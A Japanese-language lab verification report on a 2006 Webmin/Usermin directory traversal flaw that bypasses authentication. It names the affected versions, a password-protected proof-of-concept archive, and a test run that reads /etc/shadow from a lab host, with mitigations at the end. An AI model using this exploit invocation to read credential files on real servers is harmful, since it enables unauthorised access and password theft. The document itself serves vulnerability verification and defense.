Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit

Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit

更新履歴

2006/07/10　初版
- Author kikuzou

概要

ウェブベースのシステム管理ツールWebminにディレクトリトラバーサルによって認証が回避される脆弱性が存在。
攻撃者はリモートホストの任意のファイルが取得可能
2006/06/23 公開

影響を受けるシステム

Webmin Version 1.280 およびそれ以前 (全てのOS)
Usermin Version 1.210 およびそれ以前 (全てのOS)

添付ファイル

files	password
webmin-poc.zip	pen-test

参考URL

Exploitの検証

検証環境

攻撃先
- CentOS 4.3
- Webmin 1.280
- IPアドレス：192.168.2.101
攻撃元
- CentOS 4.3
- IPアドレス：192.168.2.117

検証結果

任意のファイルが取得可能
攻撃元から、以下のコマンドを実行する。

# php webmin-poc.php 192.168.2.101 10000 http /etc/shadow
Content-type: text/html
X-Powered-By: PHP/4.3.9

Attacking 192.168.2.101
---------------------------------
root:xxxxxxxxxxxxxxxxxxxx:13123:0:99999:7:::
bin:*:13108:0:99999:7:::
daemon:*:13108:0:99999:7:::
adm:*:13108:0:99999:7:::
lp:*:13108:0:99999:7:::
sync:*:13108:0:99999:7:::
shutdown:*:13108:0:99999:7:::
halt:*:13108:0:99999:7:::
mail:*:13108:0:99999:7:::
news:*:13108:0:99999:7:::
uucp:*:13108:0:99999:7:::
operator:*:13108:0:99999:7:::
games:*:13108:0:99999:7:::
gopher:*:13108:0:99999:7:::
ftp:*:13108:0:99999:7:::
nobody:*:13108:0:99999:7:::
dbus:!!:13108:0:99999:7:::
vcsa:!!:13108:0:99999:7:::
nscd:!!:13108:0:99999:7:::
rpm:!!:13108:0:99999:7:::
haldaemon:!!:13108:0:99999:7:::
netdump:!!:13108:0:99999:7:::
sshd:!!:13108:0:99999:7:::
rpc:!!:13108:0:99999:7:::
rpcuser:!!:13108:0:99999:7:::
nfsnobody:!!:13108:0:99999:7:::
mailnull:!!:13108:0:99999:7:::
smmsp:!!:13108:0:99999:7:::
pcap:!!:13108:0:99999:7:::
xfs:!!:13108:0:99999:7:::
htt:!!:13108:0:99999:7:::
canna:!!:13108:0:99999:7:::
wnn:!!:13108:0:99999:7:::
apache:!!:13108:0:99999:7:::
ntp:!!:13108::::::
---------------------------------
Coded by joffer , http://securitydot.net
#

対処方法

Webmin 1.290 へのバージョンアップ
Webmin管理画面へのアクセス制御

デモンストレーション

リモートから、Webminが動作しているサーバのパスワードファイル(/etc/shadow)を入手する。